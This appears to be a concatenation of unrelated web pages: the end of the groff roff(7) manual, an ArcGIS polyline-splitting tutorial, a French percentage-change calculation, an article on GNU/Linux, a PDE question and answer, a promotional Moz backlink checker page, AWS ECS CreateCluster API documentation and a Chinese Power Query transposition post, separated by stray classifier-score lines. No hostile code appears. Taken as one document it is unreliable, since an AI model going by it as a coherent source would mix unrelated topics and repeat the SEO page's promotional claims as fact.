Eric Allman), ms (from Manuscript Macros/), and mm (from Memorandum Macros/).   The roff Formatting Language The classical roff formatting language is documented in the Troff User's Manual [CSTR~#54]. The roff language is a full programming language providing requests, definition of macros, escape sequences, string variables, number or size registers, and flow controls. Requests are the predefined basic formatting commands similar to the commands at the shell prompt. The user can define request-like elements using predefined roff elements. These are then called macros. A document writer will not note any difference in usage for requests or macros; both are written on a line on their own starting with a dot. Escape sequences are roff elements starting with a backslash They can be inserted anywhere, also in the midst of text in a line. They are used to implement various features, including the insertion of non-ASCII characters with font changes with in-line comments with the escaping of special control characters like and many other features. Strings are variables that can store a string. A string is stored by the .ds request. The stored string can be retrieved later by the [rs]* escape sequence. Registers store numbers and sizes. A register can be set with the request .nr and its value can be retrieved by the escape sequence [rs]n.   FILE NAME EXTENSIONS Manual pages (man pages) take the section number as a file name extension, e.g., the filename for this document is roff.7, i.e., it is kept in section~7 of the man pages. The classical macro packages take the package name as an extension, e.g. file.me for a document using the me macro package, file.mm for mm, file.ms for ms, file.pic for pic files, etc. But there is no general naming scheme for roff documents, though file.tr for troff file is seen now and then. Maybe there should be a standardization for the filename extensions of roff files. File name extensions can be very handy in conjunction with the less(1) pager. It provides the possibility to feed all input into a command-line pipe that is specified in the shell environment variable LESSOPEN. This process is not well documented, so here an example:   ellCommand LESSOPEN='|lesspipe %s' where lesspipe is either a system supplied command or a shell script of your own.   EDITING ROFF The best program for editing a roff document is Emacs (or Xemacs), see emacs(1). It provides an nroff mode that is suitable for all kinds of roff dialects. This mode can be activated by the following methods. When editing a file within Emacs the mode can be changed by typing `M-x nroff-mode', where M-x means to hold down the Meta key (or Alt) and hitting the x~key at the same time. But it is also possible to have the mode automatically selected when the file is loaded into the editor. The most general method is to include the following 3 comment lines at the end of the file. Comment] Local Variables: Comment] mode: nroff Comment] End: There is a set of file name extensions, e.g. the man pages that trigger the automatic activation of the nroff mode. Theoretically, it is possible to write the sequence Comment] -*- nroff -*- as the first line of a file to have it started in nroff mode when loaded. Unfortunately, some applications such as the man program are confused by this; so this is deprecated. All roff formatters provide automated line breaks and horizontal and vertical spacing. In order to not disturb this, the following tips can be helpful. Never include empty or blank lines in a roff document. Instead, use the empty request (a line consisting of a dot only) or a line comment Comment] if a structuring element is needed. Never start a line with whitespace because this can lead to unexpected behavior. Indented paragraphs can be constructed in a controlled way by roff requests. Start each sentence on a line of its own, for the spacing after a dot is handled differently depending on whether it terminates an abbreviation or a sentence. To distinguish both cases, do a line break after each sentence. To additionally use the auto-fill mode in Emacs, it is best to insert an empty roff request (a line consisting of a dot only) after each sentence. The following example shows how optimal roff editing could look. This is an example for a roff document. This is the next sentence in the same paragraph. This is a longer sentence stretching over several lines; abbreviations like `cf.' are easily identified because the dot is not followed by a line break. In the output, this will still go to the same paragraph. Besides Emacs, some other editors provide nroff style files too, e.g. vim(1), an extension of the vi(1) program.   BUGS UNIX[rg] is a registered trademark of the Open Group. But things have improved considerably after Caldera had bought SCO UNIX in 2001.   SEE ALSO There is a lot of documentation on roff. The original papers on classical troff are still available, and all aspects of groff are documented in great detail.   Internet sites troff.org provides an overview and pointers to all historical aspects of roff. Multics contains a lot of information on the MIT projects, CTSS, Multics, early Unix, including runoff; especially useful are a glossary and the many links to ancient documents. Unix Archive provides the source code and some binaries of the ancient Unixes (including the source code of troff and its documentation) that were made public by Caldera since 2001, e.g. of the famous Unix version~7 for PDP-11 at the Developers at AT&T Bell Labs provides a search facility for tracking information on the early developers. Plan 9 by AT&T Bell Labs. runoff stores some documents using the ancient runoff formatting language. CSTR Papers stores the original troff manuals (CSTR #54, #97, #114, #116, #122) and famous historical documents on programming. GNU roff provides the free roff implementation groff, the actual standard roff.   Historical roff Documentation Many classical troff documents are still available on-line. The two main manuals of the troff language are [CSTR~#54] J. F. Osanna, Bell Labs, 1976; revised by Brian Kernighan, 1992. [CSTR~#97] Brian Kernighan, Bell Labs, 1981, revised March 1982. The "little language" roff papers are [CSTR~#114] Jon L. Bentley and Brian W. Kernighan, Bell Labs, August 1984. [CSTR~#116] Brian W. Kernighan, Bell Labs, December 1984. [CSTR~#122] J. L. Bentley, L. W. Jelinski, and B. W. Kernighan, Bell Labs, April 1986.   Manual Pages Due to its complex structure, a full roff system has many man pages, each describing a single aspect of roff. Unfortunately, there is no general naming scheme for the documentation among the different roff implementations. In groff, the man page groff(1) contains a survey of all documentation available in groff. On other systems, you are on your own, but troff(1) might be a good starting point.   AUTHORS Copyright (C) 2000, 2001, 2002, 2003, 2004 Free Software Foundation, Inc. This document is distributed under the terms of the FDL (GNU Free Documentation License) version 1.1 or later. You should have received a copy of the FDL on your system, it is also available on-line at the This document is part of groff, the GNU roff distribution. It was written by it is maintained by   Index NAME DESCRIPTION HISTORY The Predecessor runoff The Classical nroff/troff System Commercialization Free roff USING ROFF The roff Pipe ellCommand @1] @2] @3] Preprocessors Formatter Programs Devices and Postprocessors ROFF PROGRAMMING Macro Packages ortOpt m , The roff Formatting Language FILE NAME EXTENSIONS ellCommand LESSOPEN='|lesspipe %s' EDITING ROFF BUGS SEE ALSO Internet sites Historical roff Documentation Manual Pages AUTHORS Random Man Pages: ip bdflush limits full  
__label__pos
0.637591
News ArcUser Online Search ArcUser - E-mail to a Friend Road Repairs Splitting polylines with visual basic scripting By Mike Price, Entrada/San Juan, Inc. This article as a PDF .   What You Will Need • ArcGIS Desktop (ArcView, ArcEditor, or ArcInfo license) • Sample data (splittinglines.zip) Before working this exercise, you should complete "Under Construction: Building and Calculating Turn Radii" so you will understand how to calculate turn radii. "Under Construction: Building and Calculating Turn Radii" showed how to calculate turns or curve radii for a steep, winding road. The tutorial used predefined tangent points to create turn chords and to split a road centerline. This exercise will reinforce the turn chord construction technique taught in that article and teach endpoint modeling. It uses a Visual Basic (VB) script that splits all constructed curves in just one run. This tutorial includes five tasks: Task 1: After creating turn chords, add fields to store coordinates of start and endpoints. Task 2: Calculate coordinates of start and endpoints. Task 3: Load all endpoints as event themes. Task 4: Run the Visual Basic script to the split road centerline at turn chord endpoints. Task 5: Assign turn numbers and join turn chord and middle ordinate lengths, then calculate turn radii. click to enlarge Create four new fields to store X and Y coordinates for both endpoints. Getting Started Download the splittinglines.zip training set from ArcUser Online. Extract the data into a project folder and preview it in ArcCatalog. This exercise uses the original road centerline and constructs turn chords and middle ordinates. Hint: When building chords from scratch, be sure to snap to road centerline vertices. \Chuckanut2\Chuckanut2.mxd. Navigate to \Chuckanut2\SHPFiles\WASP83NFH and add the Turn Chords layer. Open and inspect its table. We will use chord endpoint coordinates to create our splitting points. Task 1: Add Endpoint Coordinate Fields First, create four new fields to store X and Y coordinates for both endpoints. These points will be stored in Washington State Plane North American Datum of 1983 (NAD 83) High Accuracy Reference Network (HARN) North in U.S. Feet. 1. Open the Turn Chords table and review its structure. 2. Open Options and select Add Field. Name the field Start_X, set its Type to Double, and set its precision to 14 and its scale to 4. Because this point must be on or very near the target line, the extra precision should help. 3. Add three more fields named Start_Y, End_X, and End_Y. Use the same data type, precision, and scale for all fields. Task 2: Calculate and Copy Endpoint Coordinates How to calculate the endpoint coordinates. 1. Begin by right-clicking on the Start_X field on its table header and select Calculate Geometry. Set Property to X Coordinate of Line Start. Use the data frame's coordinate system and set units to Feet U.S. [ft]. Click OK to calculate coordinates. 2. Continue to calculate coordinates for Start_Y, End_X, and End_Y using the same procedure. Select the correct property for each field (e.g., End_X for the End_X field), and if the wrong property is selected, just recalculate the field. 3. Navigate to the select \Chuckanut2\SHPFiles\WASP83NFH and copy Chord1.dbf to the clipboard. Navigate to \Chuckanut2\DBFFiles and paste Chord1.dbf in this folder. Right-click on the file and rename it Chord1_XY.dbf. 4. Add Chord1_XY.dbf back to the ArcMap document and switch to the table of contents (TOC) Source tab. Save the project. Task 3: Load Endpoints as Event Themes 1. In the Source tab, open and inspect Chords1_XY. Right-click on this table in the TOC and choose Display XY Data. Enter X_Start for the XField and Y_Start for the YField to define the Event Theme. Import the coordinate system from Chords1.shp. Rename this layer StartPoints. 2. Right-click on Chords1_XY again, and again choose Display XY Data. Enter X_End for the XField and Y_End for the Yfield. Import the coordinate system from Chords1.shp. Rename this layer EndPoints. 3. Carefully inspect the points to verify that they are very close to the actual end-points of each chord. Zoom to Bookmark CR MP 0.0 1:3,000. Save the project. Task 4: Load and Run the Line Splitting Script click to enlarge After making the event themes, StartPoints and EndPoints, the only selectable themes, select all points and run the SplitLinesAtPoints script. A Visual Basic script that uses points to split line segments will be used to split the Chuckanut Ridge Road centerline. The script and supporting information are available in the \Chuckanut2\Utility\ folder. 1. It is important to remove Turn Chords from the project so the only polyline theme is Chuckanut Ridge Road. 2. In the ArcMap standard menu, choose Tools > Macros > select Visual Basic Editor to open an empty VB scripting window. 3. After the VB Editor opens in its own window, locate the Project window and notice the Normal and Project selections. Selecting Normal will store changes for all maps accessed on this computer. Selecting Project will store changes only for this map document. For this model, select and expand Project. 4. In the VB Editor standard menu, choose the File > Import File. Navigate to \Chuckanut2\Utility, locate SplitLinesAtPoints.bas, and click Open. 5. Expand the Modules folder; double-click the SplitLinesAtPoints module to view the VB code. No changes are required to this code. Close VB Window. Save the ArcMap document now to save this script in this project. 6. To run the script in ArcMap, verify that the polyline target (Chuckanut Ridge Road) and the splitting points (StartPoints and Endpoints) are in the TOC. Zoom to Bookmark CR All 1:12,000. 7. Choose Tools > Editor toolbar to load the Editor toolbar, and choose Editor > Start Editing from the drop-down menu. Select the \Chuckanut2\SHPFiles\WASP83NFH\ folder as the folder to edit data from. 8. Make both StartPoints and Endpoints the only selectable layers. Use Zoom Out and the Selection tool or use the table to select all 47 points. 9. In the Tools Menu, choose Macros > Macros > Select SplitLinesAtPoints and click Run. Review the summary windows to see how many points were used to split the road and how many splits occurred. This will actually split the road twice, using both Event Theme sets. Save the edits and the project. Task 5: Assign Turn Numbers Reload the Turn Chords layer and add the Middle Ordinate layer and make Chuckanut Ridge Road the only selectable layer. Use CR MP 0.01:3,000 to zoom to the south end of the road. Use the Turn Chord layer as a guide to select the first turn segment. Either open an editing session to manually assign turn numbers or use the Field Calculator to populate the Turn_No field. Notice that ArcMap labels the segment as the number is assigned. Continue assigning numbers to all 47 turns. Although these turns do not have to be numbered sequentially, it does help keep turn numbers straight. Finish the Project When finished assigning numbers, open the attribute table and sort the turn numbers in ascending order. After assigning turn numbers, to reinforce an important point from the original tutorial, join the lengths of the Turn Chord and Middle Ordinate to each road segment. Next, calculate the radius of each turn and thematically map each using the color ramp used in the original exercise. Save the finished project. Summary This exercise is an extension of "Under Construction: Building and Calculating Turn Radii" in this issue. It teaches how to derive endpoints for polyline segments and how to use the points to split one or more polylines into smaller segments. This workflow has many uses beyond transportation engineering. Acknowledgments The author thanks Esri's Technical Support team for helping develop and deploy this method. An enhancement request has been submitted for this task and several related tasks that also surfaced while developing this exercise. [an error occurred while processing this directive]
__label__pos
0.697511
Quel est le pourcentage de variation (augmentation ou diminution) de 5111 et 6335? Quel est le % de variation à partir de et ? 23.95% Comment résoudre ce problème Un guide étape par étape de Le calcul du pourcentage d'augmentation ou de diminution du est un moyen utile pour suivre l'évolution des données au cours du temps. Si vous avez deux numéros, leur relation peut être décrite par la variation en pourcentage entre eux. La raison que c'est une mesure importante est parce qu'il est normalisé. Pourcentage des augmentations et des diminutions peut être un peu déroutant au premier abord, mais devient beaucoup plus simple une fois que vous comprenez comment ils sont calculés. Pour calculer le pourcentage de changement, nous allons utiliser trois opérations. Comme d'habitude avec un pourcentage de problèmes, ces opérations impliquent l'arithmétique de base. Dans ce cas, nous voulons calculer le pourcentage d'augmentation ou de la diminution de 5111 et 6335. Voici les étapes: Étape 1: Soustraction à partir de 5111 6335 La première étape est de trouver la différence entre le nouveau numéro (le deuxième entrée, 6335) et l'ancien numéro (la première entrée, 5111). Nous pouvons faire cela simplement en soustrayant 5111 à partir de 6335: $$ 6335 - 5111 = 1224 $$ Étape 2: Fracture de 5111 1224 La seconde étape consiste à diviser le résultat de l'étape 1 par le nombre d'origine. Ceci est fait afin de comparer la différence du nombre d'origine. L'équation pour ce est tout simplement: $$ \frac{1224}{5111} = 1224 \div 5111 = 0.23948346703189 $$ Étape 3: Multiplier par 100 0.23948346703189 La dernière étape de ce calcul est de multiplier le résultat de l'étape 2 par 100 pour le transformer en un pourcentage (%). Cette équation est fort simple: $$ 0.23948346703189 \times 100 = 23.95 $$ Et là vous l'avez! Ces trois étapes peuvent être utilisées pour calculer le pourcentage d'augmentation ou de la diminution de deux nombres. Faire un essai avec un autre ensemble de nombres.
__label__pos
0.544666
Reviews What Is GNU In GNU/Linux? What is GNU in GNULinux We have been using a lot of free and open source software and often this software is licensed under GNU/GPL. Our very famous Linux Project, the base for tens of modern operating systems, is itself licensed under GNU and is often called GNU/LINUX as it uses most software licensed under GNU.   ​What is GNU? GNU is an operating system and an extensive collection of free and open source software all of which are licensed under GPL(General Public License). A lot of people often get confused with the full form of GNU. Well, the full form of GNU is GNU’s Not UNIX. Yes, this is not a typing error and you read it right. It is a recursive word and has no actual meaning. However, an animal called Wildebeest is in some places called GNU, hence it was chosen as the official mascot for GNU.   How GNU started? Richard stallman Richard stallman Till the ’70s, the software was often shared among people and developers would see each other code and often modify each other’s software. This golden era didn’t last long and by the early ’80s, the term proprietary software had been coined. Most of the software became proprietary and it became impossible to Richard Stallman started the GNU project in 1983 with a view to creating and distributing software that could be used freely by anyone.around the world. Richard Stallman wanted to create a fully free operating system that had components and software which were freely available to the general public. Stallman wanted an environment where users could use, understand and modify the source code and even distribute modified versions of the same. This later was published as GNU Manifesto.   GNU vs. GNU/Linux GNU vs. GNU/Linux So GNU is an operating system and Linux is a kernel. Both of them are based on UNIX. GNU has its own environment with the GNU OS and the GNU tools. Linux, on the other hand, is just a kernel and it uses GNU tools and software to interact with the kernel. When you are using bash on your Linux desktop, you are using GNU’s software which is compiled using GNU’s compilers to use for Linux kernel.   The Naming Controversy There has always been a controversy regarding whether Linux should be called GNU/Linux or just plain Linux. The reason is that GNU promoters believe that GNU was already a  complete system and the Linux kernel merely filled the void by creating a very famous kernel since most of Linux Software comes under GNU, it should be called GNU/Linux. However, some Linux enthusiasts like to side the fact that Linux should be called Linux only.   Conclusion Richard Stallman created GNU project and that work led to fame and popularity of Linux Based OS in modern-day as we know it. The GNU project is complete with every tool and software needed to create and run software from compilers and editors to utility software. GNU/Linux is often used for Linux as a whole system using Linux kernel and GNU tools. You can read more about Richard Stallman in our article here. Leave a Comment This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More
__label__pos
0.926704
1 $\begingroup$ Edit : I just learned that all weak solutions are $C^\infty$, so this question, by Willie, seems more appropriate than the current one. I want to find weak, non trivial, continuous, solutions of $$\Delta u - \lambda u = 0$$ for a square domain in $\mathbb{R}^N$, $N \ge 2$, under periodic boundary conditions, and under an added constraint that, the weak solutions $u$ should take given values, at a given finite set of points in the interior of the domain. $u(x_i) = d_i$, $x_i$ lie in the interior of the domain, and $d_i$ are reals. Reference request, if someone already solved it, or partially solved it or any relevant work. I am trying to solve it and I want to know if it makes sense, and I am not re-inventing, or barking up the wrong tree. PS : Solving, I mean, having a numerical solution that converges pointwise, to the actual solution. $\endgroup$ 0 1 $\begingroup$ This a very interesting problem, and I also wondered regarding these discrete conditions, a while ago. This is more of a comment/suggestion, Firstly, keeping in mind the well-posedness of Elliptic PDE, I would start working with the case of $\lambda \geq 0$. And to make things easier have a Dirichlet boundary, Periodic boundary wouldn't be very different, we will the have to consider the point on the boundary of the given space to also be active nodes, but there is a subtle problem here, how do we define connectivities of these nodes with the other boundary nodes? By the taking the nodes from the internal of the other boundary being place at the same spacing on the empty side of the other periodic boundary, like ghost points and then making the connectivities. Second, taking in the conditions to be satisfied internally also as boundary conditions, we have a domain with "holes" (even then it is a connected domain) and it is a Lipschitz domain, so Lax-Milgram theorem can be applied, resulting in a well-posed problem. I am pretty sure the solution in our case would be continuous and has weak derivatives from the well-posedness of the variational form, I am not sure of elliptic regularity possibly because of the "holes" but I feel it should be there as well!? Third, for the numerical solution, I would start working with conformal FEM or the Ritz-Galerkin method, but making sure our discretization or Triangulation of the space is such that, these given point are nodes and not internal to triangles (lets call them special nodes), so that it is conformal and the related conditions can be easily applied. Now for simplicity, if we take up only linear basis, we write the numerical solution in terms of the basis of hat functions, see that the special nodes also have hat functions associated whose coefficients are known from the given conditions and be put on the RHS. The number of unknowns would be the rest of the nodes, and a system can be formed of that required size by testing with the hat functions (the remaining ones). And, if the triangulation is conformally (i.e. special nodes are nodes and not internal to triangles) refined, I would expect convergence similar to the general advection-diffusion problem. Although the abstraction is the same, it would get complicated to implement for higher dimensional case, like it is the case usually. Regarding references: I searched for these "hole" kind of dirichlet boundaries but didn't find any! $\endgroup$ Your Answer By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.794272
Moz Backlink Checker Enter a URL Max Backlinks to Find Captcha About Moz Backlink Checker Moz Backlink Checker Significance for Search Engine Optimization moz backlink checker As a digital marketer, you must be aware of the significance of backlink in Search engine optimization. Without requiring quality backlinks, it is not possible for any online business to compete. The backlink is basically and incoming hyperlink from a third party website. the link of a particular webpage, web directory or the entire website is posted on another website by hyperlink. These hyperlinks are generally created in guest posts and blogs containing some meaningful information. Generally, we prefer high traffic websites for or backlinking purpose because the probability of diverting is there traffic to your website always remain higher. Insured cover you can consider backlinking as the most effective ad evergreen strategy to increase traffic and conversion. Moreover, backlinks are also helpful in improving the footprints of a website on the world wide web.  wide web. More backlinks on highly ranking websites mean Google will recognize your site as a trustful domain. All the backlinks that you create are not genuine. some of the domains where you put your backlinks may contain malicious content. Rather than promotion, backlinks on such kind of websites result in the drastic downfall of ranking. Google crawlers regular check the entire content of your web pages. If they find any kind of malicious activity regarding the backlinks, your ranking will go down. Now, the question is how to identify the quality of backlinks? it is possible with the help of the Moz backlink checker tool. in the article below, we will understand in detail regarding the features of this useful tool and its significance in Search engine optimization. What is Moz Backlink Checker? This online tool is capable of examining and showing the quality of inbound links by including the factor like spam score, page authority and domain authority. A good amount of backlink research is possible with its free version, but premium search enables you to use more sophisticated inbuilt tools for improving your search engine ranking. The final results of this tool help you in understanding the efficiency of a web page to influence online visitors. not only for your website, but you can also check the backlinking data of competitors. It is a great advantage for marketers who are struggling hard to stay ahead in the competition. From the overview, it is not clear that the most backlink checker tool has a great significance for digital marketers. Now, you are going to understand its need in detail. Why do we need a Moz Backlink Checker tool? 1. Checking the backlinks to any website The backlink checker tool allows you to understand the current ranking of your website. from the beginning of digital marketing practices to the current times, you or other marketers must have created a lot of backlinks. This tool is capable of examining every single link and bringing it to you valuable result. 2. Comparison with the competitor backlinks Every marketer wants to know the strategies of competitors. It is not possible that you are the only player of online trading in a particular market segment. A lot of competitors will be already struggling hard to stay ahead from the perspective of ranking. Backlinks play a key role in affecting the search engine results. you can enter the URL of the competitor domain in the Moz backlink checker tool for identifying the strategies of competitors. All of their backlinks will appear in the report along with their quality. after studying this analytical report, you can also target the same sites for backlinking purpose. 3. Identifying links The Moz backlink checker tool critically analyses every single backlink. It is possible that some of them are broken, lost or just newly introduced. It is very important to identify the broken links because they are badly affecting your ranking. After identifying, you can use a broken link builder tool for reproducing the content of broken links. If you have lost a backlink due to relocation or removal of that particular page, contact the website owner and request for a new backlink. 4. Analyze the domain authority score This tool is capable of identifying both good and bad backlinks. There is no need to to check the domain authority of website it with separate tools because you will find a sophisticated DA checker. You can classify the higher domain authority links separately from inferior spammy links. It also calculates the spam score of a website to warn you regarding the reliability for the long run. If your backlink is on a website containing spam, the crawlers will surely identify and decrease the ranking. 5. Identifying the top-performing backlink content As a marketer, you always need to identify the contents containing backlinks that are delivering maximum traffic to your website. It is obvious that some backlinks perform better than others because of several factors such as the domain authority of that website, quality of content & use of relevant keywords. The Moz backlink checker organizes all the backlinks in a table according to their performance quality. You can examine the top performers to know the reason why they are better than others. It helps in making further strategies of effective Search engine optimization. Importance of Moz Backlink Checker tool 1. Optimum utilization of resources With the help of a Moz backlink checker tool, you can optimally utilize all available sources. It gathers and organizes the entire information of backlink in a manner that one can easily identify the most valuable backlinks. Information like top-performer, broken link and lost links can help in making all necessary changes timely. In this way, you can utilize the maximum possible potential of every single backlink. 2. Staying ahead in the competition Generate the critical analytical backlinking reports of all competitors with this tool and compare them with your website. It can clearly explain where you are lagging and why their ranking is higher. After a comparative study, you will discover more link building opportunities. Try to approach the backlink providers with higher domain authorities. The addresses of such websites are easy to find in the reports of competitor's backlinks. How does the Moz Backlink Checker tool work? 1. First of all, you no need to create an account on the Moz backlink checker website. It is completely free of cost. 2. An interface will appear where you can enter any URL that belongs to your competitor's website. Then select the list of backlinks need to be extracted and finally complete the captcha code before clicking the submit button. 3. Once you execute the command for searching backlinks, it generates backlink data. 4. Now compare them with your website backlinks to identify the areas where improvement is necessary. Advantages of Moz Backlink Checker Tool As per the current scenario, you cannot expect the success of any Search engine optimization campaigning without the help of Moz backlink checker. This power tool is capable of revealing all possible opportunities as well as help you identify good quality backlinks. Other Seo Tools: Backlink Generator Tool Link Analyzer
__label__pos
0.629322
CreateCluster - Amazon Elastic Container Service CreateCluster Creates a new Amazon ECS cluster. By default, your account receives a default cluster when you launch your first container instance. However, you can create your own cluster with a unique name with the CreateCluster action. Note When you call the CreateCluster API operation, Amazon ECS attempts to create the Amazon ECS service-linked role for your account so that required resources in other AWS services can be managed on your behalf. However, if the IAM user that makes the call does not have permissions to create the service-linked role, it is not created. For more information, see Using Service-Linked Roles for Amazon ECS in the Amazon Elastic Container Service Developer Guide. Request Syntax { "capacityProviders": [ "string" ], "clusterName": "string", "configuration": { "executeCommandConfiguration": { "kmsKeyId": "string", "logConfiguration": { "cloudWatchEncryptionEnabled": boolean, "cloudWatchLogGroupName": "string", "s3BucketName": "string", "s3EncryptionEnabled": boolean, "s3KeyPrefix": "string" }, "logging": "string" } }, "defaultCapacityProviderStrategy": [ { "base": number, "capacityProvider": "string", "weight": number } ], "settings": [ { "name": "string", "value": "string" } ], "tags": [ { "key": "string", "value": "string" } ] } Request Parameters For information about the parameters that are common to all actions, see Common Parameters. The request accepts the following data in JSON format. capacityProviders The short name of one or more capacity providers to associate with the cluster. A capacity provider must be associated with a cluster before it can be included as part of the default capacity provider strategy of the cluster or used in a capacity provider strategy when calling the CreateService or RunTask actions. If specifying a capacity provider that uses an Auto Scaling group, the capacity provider must already be created and not already associated with another cluster. New Auto Scaling group capacity providers can be created with the CreateCapacityProvider API operation. To use a AWS Fargate capacity provider, specify either the FARGATE or FARGATE_SPOT capacity providers. The AWS Fargate capacity providers are available to all accounts and only need to be associated with a cluster to be used. The PutClusterCapacityProviders API operation is used to update the list of available capacity providers for a cluster after the cluster is created. Type: Array of strings Required: No clusterName The name of your cluster. If you do not specify a name for your cluster, you create a cluster named default. Up to 255 letters (uppercase and lowercase), numbers, and hyphens are allowed. Type: String Required: No configuration The execute command configuration for the cluster. Type: ClusterConfiguration object Required: No defaultCapacityProviderStrategy The capacity provider strategy to set as the default for the cluster. When a default capacity provider strategy is set for a cluster, when calling the RunTask or CreateService APIs wtih no capacity provider strategy or launch type specified, the default capacity provider strategy for the cluster is used. If a default capacity provider strategy is not defined for a cluster during creation, it can be defined later with the PutClusterCapacityProviders API operation. Type: Array of CapacityProviderStrategyItem objects Required: No settings The setting to use when creating a cluster. This parameter is used to enable CloudWatch Container Insights for a cluster. If this value is specified, it will override the containerInsights value set with PutAccountSetting or PutAccountSettingDefault. Type: Array of ClusterSetting objects Required: No tags The metadata that you apply to the cluster to help you categorize and organize them. Each tag consists of a key and an optional value, both of which you define. The following basic restrictions apply to tags: • Maximum number of tags per resource - 50 • For each resource, each tag key must be unique, and each tag key can have only one value. • Maximum key length - 128 Unicode characters in UTF-8 • Maximum value length - 256 Unicode characters in UTF-8 • If your tagging schema is used across multiple services and resources, remember that other services may have restrictions on allowed characters. Generally allowed characters are: letters, numbers, and spaces representable in UTF-8, and the following characters: + - = . _ : / @. • Tag keys and values are case-sensitive. • Do not use aws:, AWS:, or any upper or lowercase combination of such as a prefix for either keys or values as it is reserved for AWS use. You cannot edit or delete tag keys or values with this prefix. Tags with this prefix do not count against your tags per resource limit. Type: Array of Tag objects Array Members: Minimum number of 0 items. Maximum number of 50 items. Required: No Response Syntax { "cluster": { "activeServicesCount": number, "attachments": [ { "details": [ { "name": "string", "value": "string" } ], "id": "string", "status": "string", "type": "string" } ], "attachmentsStatus": "string", "capacityProviders": [ "string" ], "clusterArn": "string", "clusterName": "string", "configuration": { "executeCommandConfiguration": { "kmsKeyId": "string", "logConfiguration": { "cloudWatchEncryptionEnabled": boolean, "cloudWatchLogGroupName": "string", "s3BucketName": "string", "s3EncryptionEnabled": boolean, "s3KeyPrefix": "string" }, "logging": "string" } }, "defaultCapacityProviderStrategy": [ { "base": number, "capacityProvider": "string", "weight": number } ], "pendingTasksCount": number, "registeredContainerInstancesCount": number, "runningTasksCount": number, "settings": [ { "name": "string", "value": "string" } ], "statistics": [ { "name": "string", "value": "string" } ], "status": "string", "tags": [ { "key": "string", "value": "string" } ] } } Response Elements If the action is successful, the service sends back an HTTP 200 response. The following data is returned in JSON format by the service. cluster The full description of your new cluster. Type: Cluster object Errors For information about the errors that are common to all actions, see Common Errors. ClientException These errors are usually caused by a client action, such as using an action or resource on behalf of a user that doesn't have permissions to use the action or resource, or specifying an identifier that is not valid. HTTP Status Code: 400 InvalidParameterException The specified parameter is invalid. Review the available parameters for the API request. HTTP Status Code: 400 ServerException These errors are usually caused by a server issue. HTTP Status Code: 500 Examples In the following example or examples, the Authorization header contents (AUTHPARAMS) must be replaced with an AWS Signature Version 4 signature. For more information, see Signature Version 4 Signing Process in the AWS General Reference. You only need to learn how to sign HTTP requests if you intend to create them manually. When you use the AWS Command Line Interface (AWS CLI) or one of the AWS SDKs to make requests to AWS, these tools automatically sign the requests for you, with the access key that you specify when you configure the tools. When you use these tools, you don't have to sign requests yourself. Example This example request creates a cluster called My-cluster. Sample Request POST / HTTP/1.1 Host: ecs.us-east-1.amazonaws.com Accept-Encoding: identity Content-Length: 29 X-Amz-Target: AmazonEC2ContainerServiceV20141113.CreateCluster X-Amz-Date: 20150429T163840Z Content-Type: application/x-amz-json-1.1 Authorization: AUTHPARAMS { "clusterName": "My-cluster" } Sample Response HTTP/1.1 200 OK Server: Server Date: Wed, 29 Apr 2015 16:38:41 GMT Content-Type: application/x-amz-json-1.1 Content-Length: 209 Connection: keep-alive x-amzn-RequestId: 123a4b56-7c89-01d2-3ef4-example5678f { "cluster": { "activeServicesCount": 0, "clusterArn": "arn:aws:ecs:us-east-1:012345678910:cluster/My-cluster", "clusterName": "My-cluster", "pendingTasksCount": 0, "registeredContainerInstancesCount": 0, "runningTasksCount": 0, "status": "ACTIVE" } } See Also For more information about using this API in one of the language-specific AWS SDKs, see the following:
__label__pos
0.667696
通过List.Transform(Many())实现行列互换 除了Table.Transpose()与List.Zip()能够完成行列互换,List.TransformMany()也可实现这一动作,不过代码相对没有那么简洁。 如果需要为上表添加行加总与列加总,使之转化为: 需要定义以下fnAddSum()函数: ( input as list ) as list ⇒ let Outcome= List.Transform( input, each List.Combine( { _, { List.Sum( _ ) } } ) ) in Outcome 该函数通过List.Transform()历遍input里的每一个串列(list),并在这些串列的结尾处添加一个元素,这个元素为串列原先所有的元素之和。 为实现行列转换,需要定义以下fnTranspose()函数: ( input as list ) as list ⇒ let Outcome= List.TransformMany( { input }, each List.Numbers( 0, List.Count( _{0} ) ), ( x, y ) ⇒ List.Transform( x, each _{y} ) ) in Outcome fnTranspose()的轴心骨为List.TransfromMany(),这个函数产生的串列如果代入List.Count(),其产生的结果将会等于该函数的第一个参数和第二个参数分别代入List.Count()的结果之乘积。为了构造出Table.FromRows()或者Table.FromColumns的第一个参数所需要的结构,List.TransformMany()的第一个参数和第二个参数这个两个之中需要有一个满足代入List.Count()的结果为1,而另外一个代入List.Count()的结果为表格的行数或者列数。在fnTranspose()中List.TransformMany()的第一个参数由于在自变量input外面套一个{},第一个参数代入List.Count()的结果为1。第二个参数构造的串列代入List.Count()后的结果刚好为行的总数或者列的总数,为在第三个参数历遍处于同一行或者同一列的元素作准备。值得一提的是,其实fnTranspose()也可以围绕着List.Transform()进行构造: ( input as list ) as list ⇒ let Outcome= List.Transform( List.Numbers( 0, List.Count( input{0} ) ), (y) ⇒ List.Transform( input, (x) ⇒ x{y} ) ) in Outcome 使用List.Transform()构造fnTranspose()其实十分类似VBA的For..Next里再套For..Next,外层的List.Transform()控制的是行数或者列数,而内层的List.Transform()则是控制对应的列数或者行数。 最后,为还原丢失的数据类型需要定义fnDataType()函数: ( input as table, datatype as type ) as table ⇒ let Outcome= Table.TransformColumnTypes( input, List.TransformMany( Table.ColumnNames( input ), each { datatype }, ( x, y ) ⇒ { x, y } ) ) in Outcome 这个函数需要理解了List.TransformMany()里第一个参数调用了Table.ColumnNames的结果(该结果如果代入List.Count()将等于表格的列数),第二个参数由于串列里只有一个元素,所有List.TransformMany()的结果的元素的个数会与列数一样(列数=列数*1)。 以下为从列开始转化的代码: let ToCols = Table.ToColumns( DB ), SumByCols = fnAddSum( ToCols ), Transpose= fnTranspose( SumByCols ), SumByRows = fnAddSum( Transpose ), ToTable = Table.FromRows( SumByRows ), DataType= fnDataType( ToTable, Number.Type ) in DataType 以下为从行开始转化的代码: let ToRows = Table.ToRows( DB ), SumByRows = fnAddSum( ToRows ), Transpose= fnTranspose( SumByRows ), SumByCols = fnAddSum( Transpose ), ToTable = Table.FromColumns( SumByCols ), DataType= fnDataType( ToTable, Number.Type ) in DataType 4 Replies to “通过List.Transform(Many())实现行列互换” 1. 感谢老师的精彩分享!文中“( input as table, datatype as type ) as table ⇒”可改为“( input as table ) as table 